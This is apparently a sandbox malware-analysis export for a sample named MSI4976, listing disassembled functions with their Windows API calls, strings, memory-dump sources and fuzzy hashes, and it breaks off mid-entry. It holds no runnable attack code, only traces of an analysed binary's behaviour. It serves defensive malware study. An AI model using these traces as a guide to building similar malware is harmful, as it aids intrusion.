                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: c3f60d1807f35c3a24f68d11be1a6ecacde6f131371ac296986de040d2f3e90f
                                        • Instruction ID: 52faccc036b74348d089ae49a2e6e92a234e5d71989cfd4b79546b7c583d5236
                                        • Opcode Fuzzy Hash: c3f60d1807f35c3a24f68d11be1a6ecacde6f131371ac296986de040d2f3e90f
                                        • Instruction Fuzzy Hash: 52113C75521208BFDB12CF64DC84EEF77BCEF05744F12945AA945E7210E731AE509B60
                                        Function 0035A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 768217c2182a650eac814016dd6fa8c55f098d3f35444bb0d790220a6a17fafb
                                        • Instruction ID: b2937576f338651d8b29de785c479f6553fedacc68f0bb21be7c551d44292334
                                        • Opcode Fuzzy Hash: 768217c2182a650eac814016dd6fa8c55f098d3f35444bb0d790220a6a17fafb
                                        • Instruction Fuzzy Hash: F4C19075A0061AEFCB15CF94C884EAEB7B5FF48301F114698ED01AB261D730DE45EBA1
                                        Function 0032131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003216F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00321751
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0032159B
                                        • CoInitialize.OLE32(00000000), ref: 00321612
                                        • CloseHandle.KERNEL32(00000000), ref: 003958F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                        • String ID: '/6
                                        • API String ID: 458326420-535110787
                                        • Opcode ID: e6a9184a0bd4e0bf1bc842780bd4257ef1064f712c7525f8c4c610b427610485
                                        • Instruction ID: 07791e7d71d18bf18152b3e41c208142403fa75d998ad74ed71e8da3193c898f
                                        • Opcode Fuzzy Hash: e6a9184a0bd4e0bf1bc842780bd4257ef1064f712c7525f8c4c610b427610485
                                        • Instruction Fuzzy Hash: 837198B99012D58AC723DF6BB9D0898BABCFB59744B94432ED00A8F7E2DB7044849F11
                                        Function 0036CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003241A7: _fseek.LIBCMT ref: 003241BF
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF49
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF5C
                                        • _free.LIBCMT ref: 0036CDC9
                                        • _free.LIBCMT ref: 0036CDD0
                                        • _free.LIBCMT ref: 0036CE3B
                                          • Part of subcall function 003428CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428DE
                                          • Part of subcall function 003428CA: GetLastError.KERNEL32(00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428F0
                                        • _free.LIBCMT ref: 0036CE43
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                        • String ID:
                                        • API String ID: 1552873950-0
                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                        • Instruction ID: efe8a3c6eddd0578fa59cd8dd39cf6e3d0ff4ceaaf18b757db2c82303f3d621e
                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                        • Instruction Fuzzy Hash: 11515FB1904218AFDF159F64DC81AAEB7B9EF08300F1040AEF659A7241D7716A90CF29
                                        Function 00321E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00321E87
                                          • Part of subcall function 003238E4: _memset.LIBCMT ref: 00323965
                                          • Part of subcall function 003238E4: _wcscpy.LIBCMT ref: 003239B5
                                          • Part of subcall function 003238E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003239C6
                                        • KillTimer.USER32(?,00000001), ref: 00321EDC
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00321EEB
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00394526
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                        • String ID:
                                        • API String ID: 1378193009-0
                                        • Opcode ID: 0b97a6cbe52255542eb2f67cf3b6cc15445589f9307a2c67311994070de696a4
                                        • Instruction ID: 9c297789e6aa59ca0bb48b9a1c0e37a9c1ac28e94c936e5865226c42075bf684
                                        • Opcode Fuzzy Hash: 0b97a6cbe52255542eb2f67cf3b6cc15445589f9307a2c67311994070de696a4
                                        • Instruction Fuzzy Hash: 472138B1904394AFEB338B64DC55FEBBBEC9B16308F06008DE69E5B181C7746A85CB51
                                        Function 003792C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0036AEA5,?,?,00000000,00000008), ref: 0033F282
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0036AEA5,?,?,00000000,00000008), ref: 0033F2A6
                                        • gethostbyname.WS2_32(?), ref: 003792F0
                                        • WSAGetLastError.WS2_32(00000000), ref: 003792FB
                                        • _memmove.LIBCMT ref: 00379328
                                        • inet_ntoa.WS2_32(?), ref: 00379333
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 1504782959-0
                                        • Opcode ID: 9a64e074bed78ae7bf0a41092b80a3ef4a7ff7b9422de5ad3cfca114681ba933
                                        • Instruction ID: 472af2680db209451ce41e0aa49d893768f276c738da5318c3df56166dc83369
                                        • Opcode Fuzzy Hash: 9a64e074bed78ae7bf0a41092b80a3ef4a7ff7b9422de5ad3cfca114681ba933
                                        • Instruction Fuzzy Hash: 35116035900519AFCB16FFA0DD56DEE77BDEF08310B108025F506AB2A2DB30AE04DB51
                                        Function 0035E2E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0035E344
                                        • _strlen.LIBCMT ref: 0035E34F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout_strlen
                                        • String ID: @U=u
                                        • API String ID: 2777139624-2594219639
                                        • Opcode ID: 528ab9bd1fe8c8e7db9c157349c1362f7cfe61479372c6f44d068e2b3be9bc2d
                                        • Instruction ID: 9eaf747a3d1ed926cdb4adcf148499a6785dbd842d230726bf87e4bc96a0e348
                                        • Opcode Fuzzy Hash: 528ab9bd1fe8c8e7db9c157349c1362f7cfe61479372c6f44d068e2b3be9bc2d
                                        • Instruction Fuzzy Hash: A111E33520021467CB0ABF69EC86DBF7BA89F45341B000479FA06DF1A2DE749A4986A0
                                        Function 0034010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003445EC: __FF_MSGBANNER.LIBCMT ref: 00344603
                                          • Part of subcall function 003445EC: __NMSG_WRITE.LIBCMT ref: 0034460A
                                          • Part of subcall function 003445EC: RtlAllocateHeap.NTDLL(017C0000,00000000,00000001), ref: 0034462F
                                        • std::exception::exception.LIBCMT ref: 0034013E
                                        • __CxxThrowException@8.LIBCMT ref: 00340153
                                          • Part of subcall function 00347495: RaiseException.KERNEL32(?,?,0032125D,003D6598,?,?,?,00340158,0032125D,003D6598,?,00000001), ref: 003474E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3902256705-2104205924
                                        • Opcode ID: f83937dcff58a724d11853eed29e5213254103d999eacf30f4a1547be84aa889
                                        • Instruction ID: 26b613da4b796d6c149587b8195db0fb39de1ed639e60e2238a96000606e25b4
                                        • Opcode Fuzzy Hash: f83937dcff58a724d11853eed29e5213254103d999eacf30f4a1547be84aa889
                                        • Instruction Fuzzy Hash: 7AF0687D20821D66CB1BAFE8DC029DE7BEC9F05350F100456FA06AE581DBB0F68096E5
                                        Function 0032C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0032C00E,?,?,?,?,00000010), ref: 0032C627
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0032C65F
                                        • _memmove.LIBCMT ref: 0032C697
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: a436cbd6dcac87135454901e5b69c03fe746761f357b709c427a55c99aebb0cb
                                        • Instruction ID: 15c128476bf16c8bf9e0edbab950132b396298af340b7bf3846e48b45e5eb042
                                        • Opcode Fuzzy Hash: a436cbd6dcac87135454901e5b69c03fe746761f357b709c427a55c99aebb0cb
                                        • Instruction Fuzzy Hash: 763107B26002016BDB2A9B74E846B2BB7D9EF44310F14553AF95ACF690EB32E950C751
                                        Function 003445EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __FF_MSGBANNER.LIBCMT ref: 00344603
                                          • Part of subcall function 00348E52: __NMSG_WRITE.LIBCMT ref: 00348E79
                                          • Part of subcall function 00348E52: __NMSG_WRITE.LIBCMT ref: 00348E83
                                        • __NMSG_WRITE.LIBCMT ref: 0034460A
                                          • Part of subcall function 00348EB2: GetModuleFileNameW.KERNEL32(00000000,003E0312,00000104,?,00000001,00340127), ref: 00348F44
                                          • Part of subcall function 00348EB2: ___crtMessageBoxW.LIBCMT ref: 00348FF2
                                          • Part of subcall function 00341D65: ___crtCorExitProcess.LIBCMT ref: 00341D6B
                                          • Part of subcall function 00341D65: ExitProcess.KERNEL32 ref: 00341D74
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • RtlAllocateHeap.NTDLL(017C0000,00000000,00000001), ref: 0034462F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                        • String ID:
                                        • API String ID: 1372826849-0
                                        • Opcode ID: f5969fd899f77e1d4dd3ba2ca6d2efa37b7effb1ee8ad5de3f72bfb3b1e60d35
                                        • Instruction ID: 7c82d8372a6605a38142d105dd1dacfd4e25c636c0c46b7314d1f7ea67d2903c
                                        • Opcode Fuzzy Hash: f5969fd899f77e1d4dd3ba2ca6d2efa37b7effb1ee8ad5de3f72bfb3b1e60d35
                                        • Instruction Fuzzy Hash: 02019231602201AAE6277B74AC42B6E33CCEB83761F530135F5059F1D2DFB8BC818A64
                                        Function 0032E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 0032E646
                                        • DispatchMessageW.USER32(?), ref: 0032E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E664
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 4217535847-0
                                        • Opcode ID: 721c8da75ac9c904711c6a34e8afede6f4ef0cbb39ceecb269f7ac94d89e1889
                                        • Instruction ID: 681900887f97bd78d91ab118cd7a1c077a94f48a91470ce86fba60dae31103c2
                                        • Opcode Fuzzy Hash: 721c8da75ac9c904711c6a34e8afede6f4ef0cbb39ceecb269f7ac94d89e1889
                                        • Instruction Fuzzy Hash: 60F01C766043559BDB62EAE19D8ABABB3DDBB94740F490C2DF642C6190EBB0D4048722
                                        Function 0036C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0036C45E
                                          • Part of subcall function 003428CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428DE
                                          • Part of subcall function 003428CA: GetLastError.KERNEL32(00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428F0
                                        • _free.LIBCMT ref: 0036C46F
                                        • _free.LIBCMT ref: 0036C481
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                        • Instruction ID: 1486c8196e64320c9accf6a4275effeabafeadc1f5f90c3575f2b2daa7b1ee7b
                                        • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                        • Instruction Fuzzy Hash: D8E017A161570196CA27EA7BA854BBB63CC6F04761B55982EF489EF186DF28F8408138
                                        Function 0033058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CALL
                                        • API String ID: 0-4196123274
                                        • Opcode ID: 0e882adaddb37483a00aafce6786750ad14ba960b898c94c5929ed82541faca6
                                        • Instruction ID: 2fdb4d25268aafc51cbb68db15b794f6669dc1f9054d99051c9bfb82efb5ab55
                                        • Opcode Fuzzy Hash: 0e882adaddb37483a00aafce6786750ad14ba960b898c94c5929ed82541faca6
                                        • Instruction Fuzzy Hash: E0228C74608340CFDB2ADF14C4A1A6AB7E5FF84304F15896DE99A8B661D731EC84CF82
                                        Function 00324010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: EA06
                                        • API String ID: 4104443479-3962188686
                                        • Opcode ID: 3ecd03a39e1b98d1b49f92102dcc8b2ea5f809811619885e236ddc0fbcdb9572
                                        • Instruction ID: 209856e8da25d25c235179dc20a1716969fee2aec11031263b008b74e64149f0
                                        • Opcode Fuzzy Hash: 3ecd03a39e1b98d1b49f92102dcc8b2ea5f809811619885e236ddc0fbcdb9572
                                        • Instruction Fuzzy Hash: 84419C31A041749BCF138B64ECA17BEBFA69B55300F19C465EA829F282C631ADD087A1
                                        Function 0037013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscmp
                                        • String ID: 0.0.0.0
                                        • API String ID: 856254489-3771769585
                                        • Opcode ID: 608d43c644dbb04fdd9057e79698cdc36b817d7da5363bb0b8402ff20959dbe4
                                        • Instruction ID: 724056d1607b593703b1bf9e166969927c0b7e6b2429cedc4f848e6139a91ee8
                                        • Opcode Fuzzy Hash: 608d43c644dbb04fdd9057e79698cdc36b817d7da5363bb0b8402ff20959dbe4
                                        • Instruction Fuzzy Hash: F0110639700214DFCB1AEF54D991EA9B3E9AF84714B00C059F609AF791DA74ED41CBA0
                                        Function 00323BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00393CF1
